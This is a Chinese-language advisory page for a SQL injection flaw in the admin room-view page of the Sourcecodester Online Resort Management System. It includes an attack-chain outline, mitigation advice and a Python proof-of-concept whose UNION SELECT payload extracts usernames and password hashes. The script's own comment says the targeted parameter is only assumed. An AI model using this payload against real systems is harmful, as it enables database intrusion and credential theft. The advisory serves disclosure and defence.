CVE-2026-36938 CVSS 2.7 低危

CVE-2026-36938: 在线度假村管理系统SQL注入漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36938

漏洞类型

SQL注入

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Sourcecodester Online Resort Management System

漏洞概述

Sourcecodester Online Resort Management System v1.0版本被发现存在SQL注入漏洞。该漏洞位于系统的/orms/admin/rooms/view_room.php文件中，由于应用程序未对用户输入的数据进行严格的过滤和校验，导致攻击者可以构造恶意的SQL语句并通过该接口提交。尽管该漏洞的CVSS评分为2.7（低危），且要求攻击者具有高权限（PR:H），但成功利用后仍可能导致数据库中的敏感信息泄露。建议管理员尽快检查并修补该文件中的参数处理逻辑。

技术细节

该漏洞的核心原理在于Sourcecodester Online Resort Management System在处理房间查看请求时，直接将HTTP请求参数拼接到SQL查询语句中，而未使用参数化查询或预编译语句。具体受影响的文件为/orms/admin/rooms/view_room.php。攻击者首先需要通过其他手段获取系统的高权限账户（如管理员账户），因为CVSS向量显示权限要求为高（PR:H）。一旦拥有后台访问权限，攻击者可以在view_room.php的请求参数（如房间ID）中注入SQL Payload。例如，使用UNION SELECT语句可以绕过原有的查询逻辑，从users表中提取用户名、密码哈希等敏感数据。由于攻击复杂度为低且无需用户交互，该漏洞对于内部恶意人员或已获得初步访问权的攻击者具有实际利用价值。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统运行的是Sourcecodester Online Resort Management System v1.0，并确认view_room.php页面的存在。

STEP 2

2. 获取权限

由于漏洞需要高权限（PR:H），攻击者通过暴力破解、钓鱼或利用其他漏洞获取管理员后台账户凭证。

STEP 3

3. 漏洞利用

攻击者使用管理员身份登录，并在访问/orms/admin/rooms/view_room.php时，在参数中注入SQL语句（如UNION SELECT）。

STEP 4

4. 数据窃取

应用程序执行恶意SQL查询，将数据库中的敏感信息（如用户名、密码哈希）返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_url = "http://target-host/orms/admin/rooms/view_room.php"

# Vulnerable parameter (assumed based on common patterns in this file)
# The application expects an ID, but fails to sanitize it.
payload = "1 UNION SELECT NULL, username, password, NULL FROM users-- -"

# Cookies simulating a high-privilege (Admin) authenticated session
# Exploitation requires PR:H (High Privileges)
cookies = {
    "PHPSESSID": "valid_admin_session_cookie_here"
}

params = {
    "id": payload
}

try:
    response = requests.get(target_url, params=params, cookies=cookies, timeout=10)

    # Check if the SQL query executed successfully and leaked data
    if response.status_code == 200:
        # Analyze response content for database artifacts
        if "admin" in response.text or "root" in response.text:
            print("[+] Vulnerability confirmed! Data extracted.")
            print(response.text[:500]) # Print snippet of response
        else:
            print("[-] Payload executed, but no obvious data leaked in response.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except requests.RequestException as e:
    print(f"[!] Error connecting to target: {e}")

影响范围

Sourcecodester Online Resort Management System 1.0

防御指南

临时缓解措施

在官方补丁未发布前，建议在Web应用防火墙（WAF）中部署规则，拦截针对view_room.php的包含SQL关键词（如UNION, SELECT, OR）的异常请求。同时，加强后台管理账户的身份验证机制，防止凭证泄露，并定期审计数据库日志以发现异常查询行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表